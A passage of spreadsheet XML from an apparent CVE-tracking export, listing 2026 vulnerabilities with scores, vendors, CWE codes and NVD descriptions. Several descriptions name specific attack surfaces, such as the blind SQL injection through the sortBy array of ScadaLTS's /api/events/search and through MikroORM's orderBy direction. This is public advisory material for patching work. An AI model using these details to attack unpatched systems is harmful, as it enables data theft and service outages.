The vulnerabilities tracked by CVE-2026-20287 are related to improper privilege managment issues that are grouped under the Common Weakness Enumeration (CWE) Pillar CWE-269.</t>
        </is>
      </c>
      <c r="S202" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20287</t>
        </is>
      </c>
    </row>
    <row r="203">
      <c r="A203" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B203" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C203" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53716</t>
        </is>
      </c>
      <c r="D203" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E203" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F203" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G203" s="5" t="inlineStr"/>
      <c r="H203" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I203" s="5" t="inlineStr"/>
      <c r="J203" s="5" t="inlineStr">
        <is>
          <t>kubernetes</t>
        </is>
      </c>
      <c r="K203" s="5" t="inlineStr"/>
      <c r="L203" s="5" t="inlineStr"/>
      <c r="M203" s="5" t="inlineStr"/>
      <c r="N203" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O203" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P203" s="5" t="inlineStr"/>
      <c r="Q203" s="5" t="inlineStr">
        <is>
          <t>CWE-789</t>
        </is>
      </c>
      <c r="R203" s="5" t="inlineStr">
        <is>
          <t>Envoy Gateway is an open source project for managing Envoy Proxy as a standalone or Kubernetes-based application gateway. Prior to 1.7.4 and 1.8.1, getFileFromGZ in internal/wasm/httpfetcher.go calls io.ReadAll on a gzip.Reader without limiting decompressed output when a tenant-controlled EnvoyExtensionPolicy.spec.wasm[].code.http.url points to a reachable compressed Wasm payload. The 256 MiB compressed-input cap does not constrain the expanded size, no operator Wasm URL allowlist exists, and the optional sha256 check occurs only after decompression, so a comparatively small gzip stream can force a multi-gigabyte allocation in the shared controller. The resulting out-of-memory termination restarts the controller, re-reconciles the persistent custom resource, and can create a persistent cross-tenant control-plane outage. This issue is fixed in versions 1.7.4 and 1.8.1.</t>
        </is>
      </c>
      <c r="S203" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53716</t>
        </is>
      </c>
    </row>
    <row r="204">
      <c r="A204" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B204" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C204" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53719</t>
        </is>
      </c>
      <c r="D204" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E204" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F204" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G204" s="5" t="inlineStr"/>
      <c r="H204" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I204" s="5" t="inlineStr"/>
      <c r="J204" s="5" t="inlineStr">
        <is>
          <t>kubernetes</t>
        </is>
      </c>
      <c r="K204" s="5" t="inlineStr"/>
      <c r="L204" s="5" t="inlineStr"/>
      <c r="M204" s="5" t="inlineStr"/>
      <c r="N204" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O204" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P204" s="5" t="inlineStr"/>
      <c r="Q204" s="5" t="inlineStr">
        <is>
          <t>CWE-476</t>
        </is>
      </c>
      <c r="R204" s="5" t="inlineStr">
        <is>
          <t>Envoy Gateway is an open source project for managing Envoy Proxy as a standalone or Kubernetes-based application gateway. Prior to 1.7.4 and 1.8.1, translateSecurityPolicyForRoute in internal/gatewayapi/securitypolicy.go dereferences a nil authorization value when a namespace-scoped tenant creates a SecurityPolicy targeting a TCPRoute and omits spec.authorization. The persistent object triggers the panic on every reconcile; recovery in message/watchutil.go keeps the process alive but unwinds the runner/runner.go handle callback, stalling controller-wide xDS and infrastructure intermediate-representation publishing until an administrator deletes the object. The data plane continues to serve the last known good configuration while publication is stalled. This issue is fixed in versions 1.7.4 and 1.8.1.</t>
        </is>
      </c>
      <c r="S204" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53719</t>
        </is>
      </c>
    </row>
    <row r="205">
      <c r="A205" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B205" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C205" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62801</t>
        </is>
      </c>
      <c r="D205" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E205" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F205" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G205" s="5" t="inlineStr"/>
      <c r="H205" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I205" s="5" t="inlineStr"/>
      <c r="J205" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K205"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205" s="5" t="inlineStr"/>
      <c r="M205" s="5" t="inlineStr"/>
      <c r="N205" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O205" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P205" s="5" t="inlineStr"/>
      <c r="Q205" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="R205" s="5" t="inlineStr">
        <is>
          <t>Improper limitation of a pathname to a restricted directory ('path traversal') in Windows PowerShell allows an unauthorized attacker to bypass a security feature over a network.</t>
        </is>
      </c>
      <c r="S205" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62801</t>
        </is>
      </c>
    </row>
    <row r="206">
      <c r="A206" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B206" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C206" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-66816</t>
        </is>
      </c>
      <c r="D206" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E206" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F206" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G206" s="5" t="inlineStr"/>
      <c r="H206" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I206" s="5" t="inlineStr"/>
      <c r="J206" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K206" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L206" s="5" t="inlineStr"/>
      <c r="M206" s="5" t="inlineStr"/>
      <c r="N206" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O206" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P206" s="5" t="inlineStr"/>
      <c r="Q206" s="5" t="inlineStr">
        <is>
          <t>CWE-778</t>
        </is>
      </c>
      <c r="R206" s="5" t="inlineStr">
        <is>
          <t>Insufficient logging in SQL Server allows an authorized attacker to bypass a security feature over a network.</t>
        </is>
      </c>
      <c r="S206" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-66816</t>
        </is>
      </c>
    </row>
    <row r="207">
      <c r="A207" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B207" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C207" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67369</t>
        </is>
      </c>
      <c r="D207" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E207" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F207" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G207" s="5" t="inlineStr"/>
      <c r="H207" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I207" s="5" t="inlineStr"/>
      <c r="J207" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K207" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L207" s="5" t="inlineStr"/>
      <c r="M207" s="5" t="inlineStr"/>
      <c r="N207" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O207" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P207" s="5" t="inlineStr"/>
      <c r="Q207" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="R207" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in SQL Server allows an authorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="S207" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67369</t>
        </is>
      </c>
    </row>
    <row r="208">
      <c r="A208" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B208" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C208" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67383</t>
        </is>
      </c>
      <c r="D208" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E208" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F208" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G208" s="5" t="inlineStr"/>
      <c r="H208" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="I208" s="5" t="inlineStr"/>
      <c r="J208" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K208" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L208" s="5" t="inlineStr"/>
      <c r="M208" s="5" t="inlineStr"/>
      <c r="N208" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O208" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P208" s="5" t="inlineStr"/>
      <c r="Q208" s="5" t="inlineStr">
        <is>
          <t>CWE-209</t>
        </is>
      </c>
      <c r="R208" s="5" t="inlineStr">
        <is>
          <t>Generation of error message containing sensitive information in SQL Server allows an authorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="S208" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67383</t>
        </is>
      </c>
    </row>
    <row r="209">
      <c r="A209" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B209" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C209" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67386</t>
        </is>
      </c>
      <c r="D209" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E209" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F209" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G209" s="5" t="inlineStr"/>
      <c r="H209" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I209" s="5" t="inlineStr"/>
      <c r="J209" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K209" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L209" s="5" t="inlineStr"/>
      <c r="M209" s="5" t="inlineStr"/>
      <c r="N209" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O209" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P209" s="5" t="inlineStr"/>
      <c r="Q209" s="5" t="inlineStr">
        <is>
          <t>CWE-908</t>
        </is>
      </c>
      <c r="R209" s="5" t="inlineStr">
        <is>
          <t>Use of uninitialized resource in SQL Server allows an authorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="S209" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67386</t>
        </is>
      </c>
    </row>
    <row r="210">
      <c r="A210" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B210" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C210" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67633</t>
        </is>
      </c>
      <c r="D210" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E210" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F210" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G210" s="5" t="inlineStr"/>
      <c r="H210" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I210" s="5" t="inlineStr"/>
      <c r="J210" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K210" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L210" s="5" t="inlineStr"/>
      <c r="M210" s="5" t="inlineStr"/>
      <c r="N210" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O210" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P210" s="5" t="inlineStr"/>
      <c r="Q210" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="R210" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in SQL Server allows an authorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="S210" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67633</t>
        </is>
      </c>
    </row>
    <row r="211">
      <c r="A211" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B211" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C211" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69839</t>
        </is>
      </c>
      <c r="D211" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E211" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F211" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G211" s="5" t="inlineStr"/>
      <c r="H211" s="5" t="n">
        <v>0.011</v>
      </c>
      <c r="I211" s="5" t="inlineStr"/>
      <c r="J211" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K211" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L211" s="5" t="inlineStr"/>
      <c r="M211" s="5" t="inlineStr"/>
      <c r="N211" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O211" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P211" s="5" t="inlineStr"/>
      <c r="Q211" s="5" t="inlineStr">
        <is>
          <t>CWE-248</t>
        </is>
      </c>
      <c r="R211" s="5" t="inlineStr">
        <is>
          <t>Uncaught exception in Windows iSCSI Target Service allows an authorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="S211" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69839</t>
        </is>
      </c>
    </row>
    <row r="212">
      <c r="A212" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B212" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C212" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70019</t>
        </is>
      </c>
      <c r="D212" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E212" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F212" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G212" s="5" t="inlineStr"/>
      <c r="H212" s="5" t="n">
        <v>0.011</v>
      </c>
      <c r="I212" s="5" t="inlineStr"/>
      <c r="J212" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K212" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L212" s="5" t="inlineStr"/>
      <c r="M212" s="5" t="inlineStr"/>
      <c r="N212" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O212" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P212" s="5" t="inlineStr"/>
      <c r="Q212" s="5" t="inlineStr">
        <is>
          <t>CWE-65</t>
        </is>
      </c>
      <c r="R212" s="5" t="inlineStr">
        <is>
          <t>Windows hard link in Windows Compressed Folder allows an unauthorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="S212" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70019</t>
        </is>
      </c>
    </row>
    <row r="213">
      <c r="A213" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B213" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C213" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76438</t>
        </is>
      </c>
      <c r="D213" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E213" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F213" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G213" s="5" t="inlineStr"/>
      <c r="H213" s="5" t="inlineStr"/>
      <c r="I213" s="5" t="inlineStr"/>
      <c r="J213" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K213" s="5" t="inlineStr"/>
      <c r="L213" s="5" t="inlineStr"/>
      <c r="M213" s="5" t="inlineStr"/>
      <c r="N213" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O213" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P213" s="5" t="inlineStr"/>
      <c r="Q213" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="R213" s="5" t="inlineStr">
        <is>
          <t>A vulnerability in the web-based management interface of Cisco BroadWorks CommPilot Application Software could allow an authenticated, remote attacker with low privileges to alter configurations on an affected device.
This vulnerability is due to missing authorization checks. An attacker could exploit this vulnerability by sending a crafted HTTP request.&amp;nbsp;A successful exploit could allow the attacker to alter configurations on select pages.</t>
        </is>
      </c>
      <c r="S213" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76438</t>
        </is>
      </c>
    </row>
    <row r="214">
      <c r="A214" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B214" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C214" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82059</t>
        </is>
      </c>
      <c r="D214" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E214" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F214" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G214" s="5" t="inlineStr"/>
      <c r="H214" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I214" s="5" t="inlineStr"/>
      <c r="J214" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="K214" s="5" t="inlineStr">
        <is>
          <t>mongodb:mongodb</t>
        </is>
      </c>
      <c r="L214" s="5" t="inlineStr"/>
      <c r="M214" s="5" t="inlineStr"/>
      <c r="N214" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O214" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P214" s="5" t="inlineStr"/>
      <c r="Q214" s="5" t="inlineStr">
        <is>
          <t>CWE-617</t>
        </is>
      </c>
      <c r="R214" s="5" t="inlineStr">
        <is>
          <t>An internal aggregation expression in MongoDB Server was incorrectly registered as accessible to any authenticated user rather than being restricted to internal cluster operations. By crafting a malformed index specification within this expression, an authenticated user with read-only privileges could trigger an assertion failure in the index key generation code path. In certain build configurations, this assertion failure results in termination of the mongod process, causing a denial of service to all connected clients.</t>
        </is>
      </c>
      <c r="S214" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82059</t>
        </is>
      </c>
    </row>
    <row r="215">
      <c r="A215" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B215" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C215" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82069</t>
        </is>
      </c>
      <c r="D215" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E215" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F215" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G215" s="5" t="inlineStr"/>
      <c r="H215" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I215" s="5" t="inlineStr"/>
      <c r="J215" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="K215" s="5" t="inlineStr">
        <is>
          <t>mongodb:mongodb</t>
        </is>
      </c>
      <c r="L215" s="5" t="inlineStr"/>
      <c r="M215" s="5" t="inlineStr"/>
      <c r="N215" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O215" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P215" s="5" t="inlineStr"/>
      <c r="Q215" s="5" t="inlineStr">
        <is>
          <t>CWE-212</t>
        </is>
      </c>
      <c r="R215" s="5" t="inlineStr">
        <is>
          <t>A security issue in MongoDB Server's query statistics serialization on the router allows users with monitoring privileges to access unredacted search query text from other users' operations. An improper conditional check in the serialization logic causes the data redaction mechanism to be bypassed when processing search queries through the sharded cluster router. This results in sensitive query literals being stored and made accessible through the query statistics interface.</t>
        </is>
      </c>
      <c r="S215" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82069</t>
        </is>
      </c>
    </row>
    <row r="216">
      <c r="A216" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B216" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C216" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84859</t>
        </is>
      </c>
      <c r="D216" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E216" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F216" s="5" t="inlineStr">
        <is>
          <t>vulnreport@tenable.com</t>
        </is>
      </c>
      <c r="G216" s="5" t="inlineStr"/>
      <c r="H216" s="5" t="inlineStr"/>
      <c r="I216" s="5" t="inlineStr"/>
      <c r="J216" s="5" t="inlineStr">
        <is>
          <t>spring</t>
        </is>
      </c>
      <c r="K216" s="5" t="inlineStr"/>
      <c r="L216" s="5" t="inlineStr"/>
      <c r="M216" s="5" t="inlineStr"/>
      <c r="N216" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O216" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P216" s="5" t="inlineStr"/>
      <c r="Q216" s="5" t="inlineStr"/>
      <c r="R216" s="5" t="inlineStr">
        <is>
          <t>ScadaLTS 2.8.1-release-candidate build 0 is affected by an Authenticated Blind SQL Injection
The /api/events/search endpoint accepts a JSON body containing a sortBy array. The values in this array are concatenated directly into the SQL ORDER BY clause without any sanitization or parameterization. This allows authenticated users with the ROLE_USER role to perform time-based and boolean-based blind SQL injection to extract arbitrary data from the database, including password hashes of all users.
The endpoint is accessible to any authenticated user with ROLE_USER, ROLE_ADMIN, or ROLE_PUBLIC via POST /api/events/search as defined in spring-security.xml.</t>
        </is>
      </c>
      <c r="S216" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84859</t>
        </is>
      </c>
    </row>
    <row r="217">
      <c r="A217" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B217" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C217" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84993</t>
        </is>
      </c>
      <c r="D217" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E217" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F217" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G217" s="5" t="inlineStr"/>
      <c r="H217" s="5" t="inlineStr"/>
      <c r="I217" s="5" t="inlineStr"/>
      <c r="J217" s="5" t="inlineStr">
        <is>
          <t>postgresql, mysql, mongodb</t>
        </is>
      </c>
      <c r="K217" s="5" t="inlineStr"/>
      <c r="L217" s="5" t="inlineStr"/>
      <c r="M217" s="5" t="inlineStr"/>
      <c r="N217" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O217" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P217" s="5" t="inlineStr"/>
      <c r="Q217" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="R217" s="5" t="inlineStr">
        <is>
          <t>MikroORM is a TypeScript ORM for Node.js based on Data Mapper, Unit of Work and Identity Map patterns. Prior to 6.6.16 and 7.1.7, the shared SQL layer validates the field key of an orderBy clause but does not validate its direction value before AbstractSqlPlatform.getOrderByExpression concatenates it into an ORDER BY clause. Applications that bind attacker-controlled request data to the direction in em.find(), em.findOne(), em.findAndCount(), QueryBuilder.orderBy(), or QueryBuilderHelper.getQueryOrderFromObject() can permit a raw SQL fragment that performs blind or boolean extraction of data available to the database account. The BaseMySqlPlatform and MsSqlPlatform fallthrough paths have the same behavior, affecting SQLite, PostgreSQL, MySQL, MariaDB, MSSQL, libSQL, and Oracle drivers, while MongoDB is not affected. This issue is fixed in versions 6.6.16 and 7.1.7.</t>
        </is>
      </c>
      <c r="S217" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84993</t>
        </is>
      </c>
    </row>
    <row r="218">
      <c r="A218" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B218" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C218" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92139</t>
        </is>
      </c>
      <c r="D218" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E218" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F218" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G218" s="5" t="inlineStr"/>
      <c r="H218" s="5" t="inlineStr"/>
      <c r="I218" s="5" t="inlineStr"/>
      <c r="J218" s="5" t="inlineStr">
        <is>
          <t>jenkins</t>
        </is>
      </c>
      <c r="K218" s="5" t="inlineStr"/>
      <c r="L218" s="5" t="inlineStr"/>
      <c r="M218" s="5" t="inlineStr"/>
      <c r="N218" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O218" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P218" s="5" t="inlineStr"/>
